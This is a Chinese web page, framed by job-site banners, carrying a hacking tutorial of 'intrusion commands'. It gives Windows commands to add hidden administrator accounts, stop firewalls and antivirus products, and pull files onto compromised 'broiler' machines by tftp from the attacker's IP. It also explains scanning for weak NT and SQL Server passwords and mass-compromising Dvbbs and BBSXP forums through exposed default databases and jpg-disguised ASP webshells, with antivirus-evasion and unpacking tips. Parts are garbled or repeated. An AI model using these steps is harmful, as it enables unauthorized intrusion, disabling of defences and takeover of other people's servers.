 |
人才网-提供最新的人才网信息,人才信息查询,人才网招聘服务
|
人才网-提供最新的人才网信息,人才信息查询,人才网招聘服务
|
|
| |
|
常用入侵命令 |
|
|
第一课: 入侵必备DOS命令总结 一.对用户操做 net user --------查看有哪些用户 net user guest /active:yes ------ 激活guest用户 net user 用户名 密码 /add ------建立用户 net localgroup administrators 用户名 /add ------- 把“用户”添加到管理员中使其具有管理员权限 二.必备命令 net start -----查看开启了哪些服务 net start 服务名-----开启服务 net stop 服务名------停止某服务 netstat -an :查看端口的网络连接情况 ipconfig :查看本地ip地址 三.关防火墙,杀毒软件命令 net stop sharedaccess ----关系统自带防火墙 pskill.exe ravmon -----杀掉瑞星软件 pskill.exe pfw ----关天网防火墙 net stop "Symantec AntiVirus"----关于诺顿企业版 net stop KAVStart------关闭金山杀毒 向肉鸡上传文件命令: 第一种方法:tftp 命令格式:tftp -i 你的公网IP get xx.exe :计算机运行命令全集 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构 wupdmgr--------windows更新程序 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构 wupdmgr--------windows更新程序 wscript--------windows脚本宿主设置 write----------写字板winmsd-----系统信息 wiaacmgr-------扫描仪和照相机向导 winchat--------XP自带局域网聊天 mem.exe--------显示内存使用情况 Msconfig.exe---系统配置实用程序 mplayer2-------简易widnows media player mspaint--------画图板 mstsc----------远程桌面连接 mplayer2-------媒体播放机 magnify--------放大镜实用程序 mmc------------打开控制台 mobsync--------同步命令 dxdiag---------检查DirectX信息 drwtsn32------ 系统医生 devmgmt.msc--- 设备管理器 dfrg.msc-------磁盘碎片整理程序 diskmgmt.msc---磁盘管理实用程序 dcomcnfg-------打开系统组件服务 ddeshare-------打开DDE共享设置 dvdplay--------DVD播放器 net stop messenger-----停止信使服务 net start messenger----开始信使服务 notepad--------打开记事本 nslookup-------网络管理的工具向导 ntbackup-------系统备份和还原 narrator-------屏幕"讲述人" ntmsmgr.msc----移动存储管理器 ntmsoprq.msc---移动存储管理员操作请求 netstat -an----(TC)命令检查接口 syncapp--------创建一个公文包 sysedit--------系统配置编辑器 sigverif-------文件签名验证程序 sndrec32-------录音机 shrpubw--------创建共享文件夹 secpol.msc-----本地安全策略 syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 services.msc---本地服务设置 Sndvol32-------音罖@刂瞥绦?br>sfc.exe--------系统文件检查器 sfc /scannow---windows文件保护 tsshutdn-------60秒倒计时关机命令 tourstart------xp简介(安装完成后出现的漫游xp程序) taskmgr--------任务管理器 eventvwr-------事件查看器 eudcedit-------造字程序 explorer-------打开资源管理器 packager-------对象包装程序 perfmon.msc----计算机性能监测程序 progman--------程序管理器 regedit.exe----注册表 rsop.msc-------组策略结果集 regedt32-------注册表编辑器 rononce -p ----15秒关机 regsvr32 /u *.dll----停止dll文件运行 regsvr32 /u zipfldr.dll------取消ZIP支持 cmd.exe--------CMD命令提示符 chkdsk.exe-----Chkdsk磁盘检查 certmgr.msc----证书管理实用程序 calc-----------启动计算器 charmap--------启动字符映射表 cliconfg-------SQL SERVER 客户端网络实用程序 Clipbrd--------剪贴板查看器 conf-----------启动netmeeting compmgmt.msc---计算机管理 cleanmgr-------**整理 ciadv.msc------索引服务程序 osk------------打开屏幕键盘 odbcad32-------ODBC数据源管理器 oobe/msoobe /a----检查XP是否激活 lusrmgr.msc----本机用户和组 logoff---------注销命令 iexpress-------木马捆绑工具,系统自带 Nslookup-------IP地址侦测器 fsmgmt.msc-----共享文件夹管理器 utilman--------辅助工具管理器 gpedit.msc-----组策略 第二课:x-scan扫描器的使用技巧详解 一.详解x-scan的配置: 1.扫描模块设置: 1).开放服务 (2).远程控制系统 (3).nt-server弱口令-----administrator 空口令或弱口令. (4).sql-server弱口令 ---sa 空口令或弱口令. 2.扫描IP范围设置: (1).指定IP范围. (2).从文件中导入IP列表. 二.x-scan在入侵中的应用: 1.对系统的综合安全检测,有针对性的入侵. 2.找肉鸡 nt-server弱口令 sql-server弱口令 3.邮箱,ftp,vnc的破解 三.x-scan入侵实例演示部分: 1.找同一城市的nt-server弱口令肉鸡.(一般都是个人PC) 2.s扫 + x-scan扫描 找sa空口令肉鸡(一般都是服务器) s扫描-----扫开放1433的机子 x-scan扫描-----对开放1433的机子进行弱口令探测. 第五课:网站猎手批量入侵实战演示 黑天 一.二个重点要素: 1.关键字: 存在漏洞的程序所共有的特证.关键字一定要选准,这样命中率才高. 选择技巧:一般选择论坛最低部的版权信息或程序名称. 2.检测的页面或文件: 也就是程序存在漏洞的地方 二.网站猎手批量入侵实战演示篇: 1.实战演示一: 检测的页面或文件: data/dvbbs7.mdb 关键字:Powered By :Dvbbs Version 7.0.0 由默认数据库到拿网站webshell过程: 第一步:下载动网默认数据库 第二步:在数据库中找管理员密码 技巧:动网论坛不需要破解MD5管理员密码,可以查看日志文件直接找到密码. 第三步:在前台以jpg格式上传asp木马. 第四步:用备份数据库功能把jpg格式备份成我们的ASP木马. 2.演示二: 检测的页面或文件:database/bbsxp.mdb 关键字:Powered by BBSXP 7.00 3.演示三: 检测的页面或文件:upfile_flash.asp 关键字:商城 四:关于批量得webshell的其它思路 1.思路一: 到大型源码下载中心,把下载量较大的源程序,下载回来研究. 主要研究他们的默认数据库地址,默认管理账号和密码,默认后台. 然后用关键字结合网站猎手批量检测.很快就提到大量webshell 2.思路二:社会工程学批量入侵拿webshell 1.免杀 2.破解 3.程序汉化,个性修改. 二.脱壳四步骤: 第一步:查壳 常用查壳工具: PEID ,FI ,PE-SCAN 等. 第二步:找OEP 工具:ollydbg 第三步:脱壳 常用脱壳工具: 1.OD自带的脱壳插件:右键脱壳之. 2.LordPE:选择所调试进程右键,完整脱壳. 第四步:修复 Import REConstructor 1.6 三.在ollydbg脱壳中常用快捷键介绍 F2: 下断点. F4:运行到所选择的那一行.-----遇到向上跳时用到 F7:单步进入----遇到近call时用到. F8:单步跟踪 F9:运行程序 Shift+F9 :忽略异常运行 Alt+M:打开内存镜像 |
| 人才网 http://www.job128.com 信息部 |